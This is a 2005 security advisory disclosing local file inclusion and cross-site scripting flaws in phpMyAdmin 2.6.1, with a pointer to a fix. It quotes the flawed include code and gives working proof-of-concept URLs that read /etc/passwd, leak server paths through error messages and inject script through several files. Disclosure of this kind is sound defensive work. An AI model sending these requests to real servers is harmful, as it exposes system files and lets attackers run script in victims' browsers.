phpMyAdmin 2.6.1 Local file inclusion ( Research Advisory )

Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in

Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files.

For exemple:

http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/pas
swd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&the
me=passwd%00
etc.

1.1
Or next include is in libraries/database_interface.lib.php

Code:

- ---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] .
'.dbi.lib.php');
- ---

For exemple:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extens
ion]=cXIb8O3

Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------

Or if you want and if you see php error and register_globals=on, can you
make
xss with php buq. For Exemple:

http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extens
ion]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. XSS aka Cross Site Scripting ---
If register_globals=On:

2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code
]

http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=t
oja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=lef
t&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]

http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=lef
t&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_f
ont_family=[XSS]
and more in this file.

2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_fami
ly=[XSS]
and more in this file.

- --- 3. How to fix ---

CVS or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&fil
e_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new
version..

- --- 4. Greets ---

sp3x.

i need help.. :(

- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr
YklTAm82iDqNu3so1uYsmEk=
=ko9x
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason